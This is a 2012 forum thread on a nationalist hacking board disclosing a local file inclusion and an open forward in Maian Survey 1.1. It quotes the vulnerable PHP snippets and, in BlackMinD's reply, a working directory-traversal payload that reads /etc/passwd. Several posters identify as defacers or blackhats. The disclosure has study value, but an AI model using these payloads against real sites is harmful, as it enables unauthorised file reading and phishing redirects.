Anti-armenia.ORG - Forumlar - Maian Survey v 1.1 /LFI/Open Forward



Istifadəçi
    2012-07-19 11:13 GMT                 

PuN!Sh3r



Gold
Mesaj Sayı : 308
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   35  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : W00t W00t
Ölkə :
Məslək : Cyber Security Specialist
Yaş :
Mesaj :

Mövzunu Paylaş!


http://packetstormsecurity.org/files/114894/Maian-Survey-1.1-Local-File-Inclusion-Open-Redirection.html


Kod:
===========================================================================
Author: PuN!Sh3r
Vulnerable Software: Maian Survey v 1.1
Official Site:http://www.maianscriptworld.co.uk/
===========================================================================
Vuln Desc:

1.Local File Inclusion:

Vuln  here : http://victim.tld/[PATH]/admin/index.php?cmd=LFİ_here


Where is the Vuln???
Let's look snippet code.
------------------------------------------------------------------
\\admin/index.php
===============================_-Snip-_=================================


$cmd = (isset($_GET['cmd']) ? $_GET['cmd'] : 'home');

include(PATH.'templates/'.$cmd.'.php');

===============================_-End Snipp-_===========================


2.Open Forward vuln:
Desc: We can Redirect users to another page(For Phising).

===============================_-Snip-_=================================

header("Location: ".REL_PATH."index.php?survey=".$_GET['preview']);

===============================_-End Snipp-_===========================




+++++++++My Special thanks to:++++++++++++++++

Anti-armenia.org & Anti-armenia Team

Greetz to My close friend ikus4 && All Azerbaijani blackhatzzz


Respect!!

./PuN!Sh3r
]

Vətən Sağ olsun!
Duman salamat qal, Dağ salamat qal..
Anti-armenia.ORG
    

Istifadəçi
    2012-07-19 11:21 GMT                 

ikus4



VIP
Mesaj Sayı : 81
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : ikus4
Yaş :
Mesaj :

Mövzunu Paylaş!


Respect

Anti-armenia.ORG
    

Istifadəçi
    2012-07-19 11:59 GMT                 

PuN!Sh3r



Gold
Mesaj Sayı : 308
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   35  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : W00t W00t
Ölkə :
Məslək : Cyber Security Specialist
Yaş :
Mesaj :

Mövzunu Paylaş!


welcome

Vətən Sağ olsun!
Duman salamat qal, Dağ salamat qal..
Anti-armenia.ORG
    

Istifadəçi
    2012-07-19 15:07 GMT                 

Avatar Fearless



VIP
Mesaj Sayı : 1299
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   23  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Gävle
Ölkə :
Məslək : Hacker,Defacer,Programmer
Yaş : 26
Mesaj :

Mövzunu Paylaş!


Wow RespEct!

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2012-07-19 15:57 GMT                 

B0T_25



Gold
Mesaj Sayı : 167
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   7  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Respect

Anti-armenia.ORG
    

Istifadəçi
    2012-07-19 16:09 GMT                 

PuN!Sh3r



Gold
Mesaj Sayı : 308
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   35  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : W00t W00t
Ölkə :
Məslək : Cyber Security Specialist
Yaş :
Mesaj :

Mövzunu Paylaş!


təşəkkürlər hər birinizə.

Vətən Sağ olsun!
Duman salamat qal, Dağ salamat qal..
Anti-armenia.ORG
    

Istifadəçi
    2012-07-19 19:05 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Pis deyil bro əsas çalışırsan amma səhvlərin var:

Kod:
$cmd = (isset($_GET['cmd']) ? $_GET['cmd'] : 'home');

include(PATH.'templates/'.$cmd.'.php');


Remote deyil local ile inclusiondur bu.
Fikir ver:

Kod:
include(PATH.'templates/'.$cmd.'.php');


CONSTANT.STRING_PATH. PARAMETER.php
Yəni:


[url]http://victim.tld/[PATH]/admin/index.php?cmd=../../../../../.././../../../../../../../../../etc/passwd%00[/url]
RFI ola bilməz orda
RFİ olsaydı belə ssenari görəcəkdin:


Kod:
$cmd = (isset($_GET['cmd']) ? $_GET['cmd'] : 'home');

include($cmd);


2-ci:
Open redirect deyil Open Forwarddır


http://www.owasp.com/index.php/Open_forward



header("Location: ".REL_PATH."index.php?survey=".$_GET['preview']);


Eyni applicationun müəyyən hissəsinə gedəcək redirect.



3-cu Əminsənki XSS-dir?Sualı verməyimdə səbəb odurki bütün ordakı data database.table-dən gəlir və səhifəyə echo edilir + cleanDataEnt() funksiyasına ötürüləndən sonra.


Birbaşa Klient side heçnə görmədim orda $_GET ya $_POST nəsə olsaydı o halda ən azından şübhələnə bilərdin ki,XSS-lik nəsə var.



4-cü də vəziyyət azdan-çoxdan şübhəlidir XSS barəsində yoxlamamış demək biraz çətin məsələdir.
Çünki orda sən HTTP move-dasan echo edilsə də nəsə o da brauzerin adres barındadır.Əsas səhifəyə echo lazımdır səndə olunsun.


XSS əvəzinə sonuncu RESPONCE SPLİT-ə yaxındır o daki aktual deyil artıq PHP >4.X.X ( x.x yadımda deyil artıq) ondan o tərəfə işləmir fixlənib çünki.


Belə düşünürəmki skripti oxumağına oxumusan azdan çoxdan amma tam başa düşməmisən o da gərək PHP dilini normal biləsən.
Çox yox 2-3 dəfə özün məsələn php-də nəsə yazsan beynin daha da açılışacaq.Çalış php -yə giriş.
+
Oxuduqdan sonra skripti çalış mütləq test elə həmişə ki,əmin olasan...

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2012-07-19 19:29 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Problem yoxdur bro səhvsiz insan yoxdur.Robot deyilik ki, hərdən mənim özümdə elə olurki full təkər oluram.İnsan beyni...
Əsas yenə də deyim çalış PHP-də skript yazasan məsələn sevdiyin bir ideyanı çalış reallaşdırasan heçnə yox adi guestbook.Gör beynin necə açılışacaq.

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2012-07-19 19:31 GMT                 

PuN!Sh3r



Gold
Mesaj Sayı : 308
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   35  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : W00t W00t
Ölkə :
Məslək : Cyber Security Specialist
Yaş :
Mesaj :

Mövzunu Paylaş!


İnşallah çalışacam daha uğurlu proyektlərlə geri dönüm

Vətən Sağ olsun!
Duman salamat qal, Dağ salamat qal..
Anti-armenia.ORG